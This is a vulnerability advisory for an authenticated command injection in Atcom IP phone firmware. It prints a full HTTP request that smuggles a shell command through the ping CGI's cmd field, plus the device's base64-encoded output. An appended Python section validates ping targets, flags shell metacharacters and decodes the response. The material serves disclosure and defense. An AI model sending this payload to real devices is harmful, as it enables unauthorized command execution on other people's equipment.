
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux

Exploit Request:

POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping

Response:

{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}

The value of "ping_cmd_result" is base64-encoded. Decoding it reveals the output of the injected command (the working directory printed by pwd is appended to the ping target), as shown below:

ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
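Added example, not part of the original advisory: a Python snippet covering the defensive side of this bug. It parses the request body quoted above, accepts only a literal IPv4/IPv6 address as the ping target (the validation the CGI handler evidently lacks before the value reaches a shell), flags shell metacharacters for log review, and decodes the base64 ping_cmd_result field the device returns. The sample body and response are the ones quoted on this page; the function names are my own.

```python
import base64
import ipaddress
import json
import re
from urllib.parse import parse_qs

# Sample request body and JSON response, copied from the advisory above.
SAMPLE_BODY = "cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping"
SAMPLE_RESPONSE = (
    '{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9'
    'saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}'
)

# Characters that let a value escape from a "ping <target>" shell command line.
SHELL_META = re.compile(r"[$`;|&<>(){}\n\r]")


def parse_cmd_param(body: str) -> str:
    """Return the raw cmd= value from a form-encoded body ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get("cmd", [""])[0]


def is_valid_ping_target(value: str) -> bool:
    """Hardened check: only a literal IPv4 or IPv6 address is accepted.

    An allow-list parse like this is the fix for the handler; anything that
    is not an address is rejected before it can reach a shell.
    """
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def looks_like_injection(value: str) -> bool:
    """Detection heuristic for web logs: shell metacharacters in the target."""
    return bool(SHELL_META.search(value))


def decode_ping_result(response_json: str) -> str:
    """Decode the base64 ping_cmd_result field so the output can be reviewed."""
    data = json.loads(response_json)
    raw = base64.b64decode(data["ping_cmd_result"])
    return raw.decode("utf-8", "replace").strip()


def triage(body: str, response_json: str) -> dict:
    """Combine the checks for one request/response pair from a capture."""
    target = parse_cmd_param(body)
    return {
        "target": target,
        "valid_target": is_valid_ping_target(target),
        "suspicious": looks_like_injection(target),
        "decoded_result": decode_ping_result(response_json),
    }
```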